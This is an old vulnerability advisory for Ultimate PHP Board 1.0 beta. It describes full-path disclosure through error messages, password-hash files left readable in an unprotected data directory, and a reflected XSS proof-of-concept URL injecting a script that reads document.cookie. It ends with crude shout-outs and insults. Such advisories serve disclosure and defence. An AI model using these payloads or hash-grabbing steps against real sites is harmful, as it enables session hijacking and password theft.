=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: XSS and Path Disclosure in UPB product: Ultimate PHP Board (UPB) final beta 1.0 vendor: http://www.webrc.ca/php/upb.php risk: middle date: 12/7/2k2 discovered by: euronymous /F0KP /HACKRU Team advisory url: http://f0kp.iplus.ru/bz/009.txt =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- 1) when calling add.php, which comming with upb, it output some error message, that contain foloving information: ================================================================ Warning: Failed opening 'textdb_v2.inc.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/samcom/public_html/public/messageboard2/add.php on line 5 attempting to edit record... Fatal error: Call to undefined function: format_field() in /home/samcom/public_html/public/messageboard2/add.php on line 11 ================================================================ as you can see, script output contain full physical path of the board. 2). but if user has deleted this file (add.php) u can to view the full path in this way: ============================================================== http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2 ============================================================== cos the `id' parameter doesnt check if input data has entered correctly, then it output folloving error message: ===================--======= snip ============================= Warning: Unable to access ./data_dir/some_shit.dat in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 240 .. Warning: Supplied argument is not a valid File-Handle resource in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 241 .. =========================== snip ============================== where `data_dir' is the name of directory, where stored important files, eg users.dat with users passwords (md5). in default name of this directory is `db'. if user doesnt make this dir secure, then you can to get the users passwds with reading file users.dat (default name.. but it is an old stuff) and cracking the .md5 hashes. 3) cos the above, file viewtopic.php doesnt check at all, the you can insert some html in scripts output: ======================================================== http://hostname.com/phorum/viewtopic.php?id= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2 ======================================================== [it must be in a single string] not URL-encoded string working fine also. ps. all of this issues applied to previus versions upb. shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all russian security guyz!! and kate for she is kewl girl )) fuck_off: slavomira and other dirty ppl in *.kz ================ im not a lame, not yet a hacker ================
